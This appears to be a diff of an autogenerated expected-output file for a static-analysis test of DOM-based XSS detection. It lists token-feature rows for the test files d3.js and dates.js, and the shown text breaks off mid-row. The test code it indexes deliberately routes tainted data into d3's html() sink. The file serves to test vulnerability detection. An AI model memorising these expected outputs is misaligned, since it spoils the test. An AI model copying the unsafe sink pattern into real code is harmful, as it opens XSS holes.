autogenerated/Xss/DomBasedXss/d3.js:12:20:12:29 | exceptional return of getTaint() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:12:20:12:29 | exceptional return of getTaint() | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:12:20:12:29 | exceptional return of getTaint() | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:12:20:12:29 | exceptional return of getTaint() | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:12:20:12:29 | getTaint() | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:12:20:12:29 | getTaint() | contextSurroundingFunctionParameters | ()\n(d) | +| autogenerated/Xss/DomBasedXss/d3.js:12:20:12:29 | getTaint() | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:12:20:12:29 | getTaint() | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:12:20:12:29 | getTaint() | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:13:10:13:13 | call | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:13:10:13:13 | call | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:13:10:13:13 | call | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:13:10:13:13 | call | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:13:10:13:13 | call | fileImports | d3 | | autogenerated/Xss/DomBasedXss/d3.js:13:15:13:27 | otherFunction | CalleeFlexibleAccessPath | d3.select().attr().style().html().html().call | | autogenerated/Xss/DomBasedXss/d3.js:13:15:13:27 | otherFunction | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/d3.js:13:15:13:27 | otherFunction | calleeImports | d3 | @@ -12799,6 +96055,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/d3.js:13:15:13:27 | otherFunction | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | | autogenerated/Xss/DomBasedXss/d3.js:13:15:13:27 | otherFunction | enclosingFunctionName | doSomething | | autogenerated/Xss/DomBasedXss/d3.js:13:15:13:27 | otherFunction | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:14:10:14:13 | html | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:14:10:14:13 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:14:10:14:13 | html | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:14:10:14:13 | html | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:14:10:14:13 | html | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:14 | getTaint | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:14 | getTaint | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:14 | getTaint | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:14 | getTaint | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:14 | getTaint | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:15 | d | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:15 | d | contextSurroundingFunctionParameters | ()\n(d) | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:15 | d | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:15 | d | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:15 | d | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | 'arguments' object of anonymous function | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | 'arguments' object of anonymous function | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | 'arguments' object of anonymous function | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | 'arguments' object of anonymous function | fileImports | d3 | | autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | d => getTaint() | CalleeFlexibleAccessPath | d3.select().attr().style().html().html().call().html | | autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | d => getTaint() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | d => getTaint() | calleeImports | d3 | @@ -12807,6 +96083,116 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | d => getTaint() | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | | autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | d => getTaint() | enclosingFunctionName | doSomething | | autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | d => getTaint() | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | exceptional return of anonymous function | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | exceptional return of anonymous function | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | exceptional return of anonymous function | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | exceptional return of anonymous function | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | return of anonymous function | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | return of anonymous function | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | return of anonymous function | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:14:15:14:29 | return of anonymous function | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:14:20:14:27 | getTaint | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:14:20:14:27 | getTaint | contextSurroundingFunctionParameters | ()\n(d) | +| autogenerated/Xss/DomBasedXss/d3.js:14:20:14:27 | getTaint | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:14:20:14:27 | getTaint | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:14:20:14:27 | getTaint | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:14:20:14:29 | exceptional return of getTaint() | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:14:20:14:29 | exceptional return of getTaint() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:14:20:14:29 | exceptional return of getTaint() | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:14:20:14:29 | exceptional return of getTaint() | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:14:20:14:29 | exceptional return of getTaint() | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:14:20:14:29 | getTaint() | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:14:20:14:29 | getTaint() | contextSurroundingFunctionParameters | ()\n(d) | +| autogenerated/Xss/DomBasedXss/d3.js:14:20:14:29 | getTaint() | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:14:20:14:29 | getTaint() | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:14:20:14:29 | getTaint() | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:18:0 | getTaint | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:18:0 | getTaint | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:18:0 | getTaint | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:18:0 | getTaint | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:18:0 | getTaint | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:18:0 | this | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:18:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:18:0 | this | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:18:0 | this | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:18:0 | this | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | 'arguments' object of function otherFunction | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | 'arguments' object of function otherFunction | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | 'arguments' object of function otherFunction | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | 'arguments' object of function otherFunction | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | 'arguments' object of function otherFunction | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | exceptional return of function otherFunction | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | exceptional return of function otherFunction | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | exceptional return of function otherFunction | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | exceptional return of function otherFunction | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | exceptional return of function otherFunction | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | functio ... OT OK\\n} | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | functio ... OT OK\\n} | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | return of function otherFunction | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | return of function otherFunction | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | return of function otherFunction | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | return of function otherFunction | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:18:1:22:1 | return of function otherFunction | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:18:10:18:22 | otherFunction | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:18:10:18:22 | otherFunction | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:18:10:18:22 | otherFunction | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:18:10:18:22 | otherFunction | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:18:10:18:22 | otherFunction | contextSurroundingFunctionParameters | (selection) | +| autogenerated/Xss/DomBasedXss/d3.js:18:10:18:22 | otherFunction | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:18:10:18:22 | otherFunction | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:18:24:18:32 | selection | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:18:24:18:32 | selection | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:18:24:18:32 | selection | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:18:24:18:32 | selection | contextSurroundingFunctionParameters | (selection) | +| autogenerated/Xss/DomBasedXss/d3.js:18:24:18:32 | selection | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:18:24:18:32 | selection | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:18:24:18:32 | selection | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:18:24:18:32 | selection | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:18:24:18:32 | selection | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:18:24:18:32 | selection | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:19:13 | selection | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:19:13 | selection | contextSurroundingFunctionParameters | (selection) | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:19:13 | selection | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:19:13 | selection | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:19:13 | selection | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:20:13 | selecti ... .attr | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:20:13 | selecti ... .attr | contextSurroundingFunctionParameters | (selection) | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:20:13 | selecti ... .attr | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:20:13 | selecti ... .attr | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:20:13 | selecti ... .attr | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:20:27 | exceptional return of selecti ... 'bar') | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:20:27 | exceptional return of selecti ... 'bar') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:20:27 | exceptional return of selecti ... 'bar') | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:20:27 | exceptional return of selecti ... 'bar') | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:20:27 | exceptional return of selecti ... 'bar') | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:20:27 | selecti ... 'bar') | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:20:27 | selecti ... 'bar') | contextSurroundingFunctionParameters | (selection) | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:20:27 | selecti ... 'bar') | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:20:27 | selecti ... 'bar') | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:20:27 | selecti ... 'bar') | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:21:13 | selecti ... .html | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:21:13 | selecti ... .html | contextSurroundingFunctionParameters | (selection) | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:21:13 | selecti ... .html | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:21:13 | selecti ... .html | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:21:13 | selecti ... .html | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:21:25 | exceptional return of selecti ... aint()) | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:21:25 | exceptional return of selecti ... aint()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:21:25 | exceptional return of selecti ... aint()) | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:21:25 | exceptional return of selecti ... aint()) | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:21:25 | exceptional return of selecti ... aint()) | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:21:25 | selecti ... aint()) | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:21:25 | selecti ... aint()) | contextSurroundingFunctionParameters | (selection) | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:21:25 | selecti ... aint()) | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:21:25 | selecti ... aint()) | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:19:5:21:25 | selecti ... aint()) | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:20:10:20:13 | attr | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:20:10:20:13 | attr | contextSurroundingFunctionParameters | (selection) | +| autogenerated/Xss/DomBasedXss/d3.js:20:10:20:13 | attr | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:20:10:20:13 | attr | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:20:10:20:13 | attr | fileImports | d3 | | autogenerated/Xss/DomBasedXss/d3.js:20:15:20:19 | 'foo' | CalleeFlexibleAccessPath | selection.attr | | autogenerated/Xss/DomBasedXss/d3.js:20:15:20:19 | 'foo' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/d3.js:20:15:20:19 | 'foo' | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | @@ -12823,6 +96209,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/d3.js:20:22:20:26 | 'bar' | enclosingFunctionName | otherFunction | | autogenerated/Xss/DomBasedXss/d3.js:20:22:20:26 | 'bar' | fileImports | d3 | | autogenerated/Xss/DomBasedXss/d3.js:20:22:20:26 | 'bar' | receiverName | selection | +| autogenerated/Xss/DomBasedXss/d3.js:21:10:21:13 | html | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:21:10:21:13 | html | contextSurroundingFunctionParameters | (selection) | +| autogenerated/Xss/DomBasedXss/d3.js:21:10:21:13 | html | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:21:10:21:13 | html | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:21:10:21:13 | html | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:21:15:21:22 | getTaint | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:21:15:21:22 | getTaint | contextSurroundingFunctionParameters | (selection) | +| autogenerated/Xss/DomBasedXss/d3.js:21:15:21:22 | getTaint | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:21:15:21:22 | getTaint | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:21:15:21:22 | getTaint | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:21:15:21:24 | exceptional return of getTaint() | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:21:15:21:24 | exceptional return of getTaint() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:21:15:21:24 | exceptional return of getTaint() | enclosingFunctionBody | selection selection attr foo bar html getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:21:15:21:24 | exceptional return of getTaint() | enclosingFunctionName | otherFunction | +| autogenerated/Xss/DomBasedXss/d3.js:21:15:21:24 | exceptional return of getTaint() | fileImports | d3 | | autogenerated/Xss/DomBasedXss/d3.js:21:15:21:24 | getTaint() | CalleeFlexibleAccessPath | selection.attr().html | | autogenerated/Xss/DomBasedXss/d3.js:21:15:21:24 | getTaint() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/d3.js:21:15:21:24 | getTaint() | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | @@ -12830,6 +96231,255 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/d3.js:21:15:21:24 | getTaint() | enclosingFunctionBody | selection selection attr foo bar html getTaint | | autogenerated/Xss/DomBasedXss/d3.js:21:15:21:24 | getTaint() | enclosingFunctionName | otherFunction | | autogenerated/Xss/DomBasedXss/d3.js:21:15:21:24 | getTaint() | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:0 | this | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:0 | this | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | DateFnsAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | DateFnsAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | DateFnsAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | DateTime | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | DateTime | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | DateTime | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | DayJSAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | DayJSAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | DayJSAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | LuxonAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | LuxonAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | LuxonAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | MomentAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | MomentAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | MomentAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | dateFns | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | dateFns | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | dateFns | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | dateFnsEsm | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | dateFnsEsm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | dateFnsEsm | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | dateFnsFp | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | dateFnsFp | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | dateFnsFp | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | dateformat | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | dateformat | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | dateformat | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | moment | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | moment | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:1 | moment | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:31 | import ... e-fns'; | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:31 | import ... e-fns'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:1:1:1:31 | import ... e-fns'; | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:1:8:1:14 | dateFns | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:1:8:1:14 | dateFns | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:1:8:1:14 | dateFns | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:1:8:1:14 | dateFns | contextSurroundingFunctionParameters | | +| 